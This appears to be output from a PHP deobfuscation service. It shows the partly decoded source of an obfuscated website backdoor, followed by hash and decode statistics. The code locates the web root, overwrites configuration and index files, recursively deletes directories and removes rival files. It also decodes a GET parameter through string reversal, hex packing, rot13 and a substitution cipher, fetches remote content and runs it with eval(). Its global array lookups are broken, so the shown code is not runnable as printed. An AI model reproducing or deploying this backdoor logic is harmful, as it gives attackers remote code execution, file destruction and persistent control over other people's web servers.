        if (strstr($zd4bR, $bN80E) || $Nucua <= 0) {
            $Nucua--;
            if ($Nucua <= 0) {
                $tlBti .= $zd4bR . $GLOBALS[][0xc];
            }
        }
    }
    return $tlBti;
}
function MiMRi($BSTSR)
{
    $iTMgs = $BSTSR . $GLOBALS[][0x5a];
    $CTswv = strtolower(aSRZX($iTMgs));
    if (preg_match($GLOBALS[][0x5b], $CTswv) || preg_match($GLOBALS[][0x5c], $CTswv)) {
        $qsml6 = $BSTSR . $GLOBALS[][0x5e];
        $HH0Dt = aSrzx($qsml6);
        if (preg_match($GLOBALS[][0x67], $HH0Dt) && !preg_match($GLOBALS[][0x68], $HH0Dt)) {
            $HH0Dt = str_replace($GLOBALS[][0x69], $GLOBALS[][0x6a], $HH0Dt);
            chmod($qsml6, 0644);
            qXb8Z($qsml6, $HH0Dt);
        }
        if (preg_match($GLOBALS[][0x65], $HH0Dt, $A0J4x)) {
            unlink($A0J4x[0x1]);
        }
        $Xa3Xv = $BSTSR . $GLOBALS[][0x6b];
        $r4rLX = ASRZX($Xa3Xv);
        if (file_exists($Xa3Xv) && (preg_match($GLOBALS[][0x6c], $r4rLX) || preg_match($GLOBALS[][0x6d], $r4rLX))) {
            unlink($Xa3Xv);
            unlink($BSTSR . $GLOBALS[][0x6e]);
        }
        $YzXVO = $BSTSR . $GLOBALS[][0x5d];
        $ZcVkF = Asrzx($YzXVO);
        if (preg_match($GLOBALS[][0x5f], $ZcVkF)) {
            $TnBIs = $GLOBALS[][0x60];
            chmod($YzXVO, 0644);
            qxb8z($YzXVO, $TnBIs);
        } elseif (strstr($ZcVkF, $GLOBALS[][0x26]) && !preg_match($GLOBALS[][0x61], $ZcVkF) && !preg_match($GLOBALS[][0x62], $ZcVkF) && !preg_match($GLOBALS[][0x63], $ZcVkF) && !preg_match($GLOBALS[][0x64], $ZcVkF)) {
            $TnBIs = rLaoq($YzXVO, $GLOBALS[][0x26]);
            chmod($YzXVO, 0644);
            qxb8z($YzXVO, $TnBIs);
        }
        chmod($iTMgs, 0644);
        $z_5mN = $GLOBALS[][0x66];
        QXb8Z($iTMgs, $z_5mN);
    }
}
function iRmJx($ok6e_)
{
    $ok6e_ = substr($ok6e_, 1) == $GLOBALS[][0x9] ? $ok6e_ : $ok6e_ . $GLOBALS[][0x9];
    $SZzID = opendir($ok6e_);
    while (($phOnJ = readdir($SZzID)) !== !1) {
        $phOnJ = $ok6e_ . $phOnJ;
        if (basename($phOnJ) == $GLOBALS[][0x1a] || basename($phOnJ) == $GLOBALS[][0x1b]) {
            continue;
        }
        $tabyZ = filetype($phOnJ);
        if ($tabyZ == $GLOBALS[][0x1c]) {
            irMjX($phOnJ);
        } else {
            @unlink($phOnJ);
        }
    }
    closedir($SZzID);
}
function ocIVI($BSTSR)
{
    $jYG7l = array($GLOBALS[][0x51], $GLOBALS[][0x52], $GLOBALS[][0x53], $GLOBALS[][0x54], $GLOBALS[][0x55], $GLOBALS[][0x56], $GLOBALS[][0x57], $GLOBALS[][0x58]);
    foreach ($jYG7l as $HH0Dt) {
        $jAUNf = $BSTSR . $GLOBALS[][0x59] . $HH0Dt;
        if (is_dir($jAUNf)) {
            iRmJx($jAUNf);
        }
    }
}
$GhlyG = strval(basename("/var/www/html/bkv8.txt"));
$aWMlI = explode($GLOBALS[][0x50], $GhlyG);
$GhlyG = $aWMlI[0] . $GLOBALS[][0xa];
$Nzr3p = aSRzx($GhlyG);
if (preg_match($GLOBALS[][0x6], $Nzr3p) || preg_match($GLOBALS[][0x7], $Nzr3p)) {
    $LhFlr = glob($GLOBALS[][0x8]);
    foreach ($LhFlr as $KKNL0) {
        if (is_file($KKNL0)) {
            unlink($KKNL0);
        }
    }
    exit;
}
function LE86Y($ZJoHI, $iTqoS)
{
    if (preg_match($GLOBALS[][0x25], $iTqoS)) {
        preg_match($GLOBALS[][0x28], $iTqoS, $s2WNP);
        $s2WNP = $s2WNP[0x1];
        $dbhhI = oDXSW($ZJoHI . $GLOBALS[][0x29] . $s2WNP);
        $iTqoS = odxSw($ZJoHI);
        $iKFfw = $GLOBALS[][0x26];
        $RJWgv = strpos($iTqoS, $iKFfw) + strlen($iKFfw);
        $iTqoS = $GLOBALS[][0x26] . substr($iTqoS, $RJWgv);
        unlink($GLOBALS[][0x27]);
    }
    return $iTqoS;
}
function FbJtr($P94B6)
{
    $dozF_ = array($GLOBALS[][0x3e] => $GLOBALS[][0x3f], $GLOBALS[][0x40] => $GLOBALS[][0x41], $GLOBALS[][0x3f] => $GLOBALS[][0x42], $GLOBALS[][0x43] => $GLOBALS[][0x44], $GLOBALS[][0x45] => $GLOBALS[][0x46], $GLOBALS[][0x47] => $GLOBALS[][0x48], $GLOBALS[][0x49] => $GLOBALS[][0x4a], $GLOBALS[][0x41] => $GLOBALS[][0x4b], $GLOBALS[][0x44] => $GLOBALS[][0x4c], $GLOBALS[][0x4d] => $GLOBALS[][0x47], $GLOBALS[][0x42] => $GLOBALS[][0x45], $GLOBALS[][0x4b] => $GLOBALS[][0x40], $GLOBALS[][0x4e] => $GLOBALS[][0x43], $GLOBALS[][0x48] => $GLOBALS[][0x4d], $GLOBALS[][0x46] => $GLOBALS[][0x4e], $GLOBALS[][0x4a] => $GLOBALS[][0x3e], $GLOBALS[][0x4c] => $GLOBALS[][0x49]);
    $zYBxV = str_split($P94B6);
    $Tax0X = $GLOBALS[][0xb];
    foreach ($zYBxV as $Um4AM) {
        if (in_array($Um4AM, $dozF_)) {
            $Tax0X .= $dozF_[$Um4AM];
        } else {
            $Tax0X .= $Um4AM;
        }
    }
    return $Tax0X;
}
function eOcGK($BSTSR)
{
    $BPpYo = realpath($BSTSR);
    if (trim($BPpYo) == $GLOBALS[][0xb]) {
        $BPpYo = $_SERVER[$GLOBALS[][0x10]];
    }
    if (!stristr(getcwd(), $BPpYo)) {
        $BPpYo = str_replace($_SERVER[$GLOBALS[][0xf]], $GLOBALS[][0xb], "/var/www/html/anj4.txt");
    }
    return $BPpYo;
}
$smTub = strval($_SERVER[$GLOBALS[][0x3d]]);
while (strstr($smTub, $GLOBALS[][0x4f])) {
    $smTub = str_replace($GLOBALS[][0x4f], $GLOBALS[][0x9], $smTub);
}
if (strstr($smTub, $GLOBALS[][0x19])) {
    $smTub = explode($GLOBALS[][0x19], $smTub);
    $smTub = $smTub[0];
}
$tzTJj = substr_count($smTub, $GLOBALS[][0x9]);
$BSTSR = $GLOBALS[][0x1d];
$K71UX = 0x1;
while ($K71UX < intval($tzTJj)) {
    $BSTSR .= $GLOBALS[][0x18];
    $K71UX++;
}
$BSTSR = EOcgk($BSTSR);
MiMRi($BSTSR);
oCIVi($BSTSR);
if (isset($_GET[$GLOBALS[][0x6f]])) {
    $vo1vU = trim($_GET[$GLOBALS[][0x73]]);
    $vo1vU = str_rot13(pack($GLOBALS[][0x74], strrev($vo1vU)));
    $F3bIg = JuGse($GLOBALS[][0x70] . FbJTr($vo1vU));
    $F3bIg = Le86y($GLOBALS[][0x70] . fbjtR($vo1vU), $F3bIg);
    $F3bIg = str_replace(array($GLOBALS[][0x26], $GLOBALS[][0x71], $GLOBALS[][0x72]), $GLOBALS[][0xb], $F3bIg);
    eval($F3bIg);
} elseif (isset($_GET[$GLOBALS[][0x75]])) {
    $CTswv = $GLOBALS[][0x66];
    chmod($BSTSR . $GLOBALS[][0x5a], 0644);
    QxB8z($BSTSR . $GLOBALS[][0x5a], $CTswv);
    unlink($BSTSR . $GLOBALS[][0x76]);
} else {
    echo $GLOBALS[][0x77] . md5($_SERVER[$GLOBALS[][0x78]]) . $GLOBALS[][0x79];
}

Function Calls

None

Variables

None

Stats

MD5 8f229a308733c5b038b9829ddc0c5c47
Eval Count 0
Decode Time 60 ms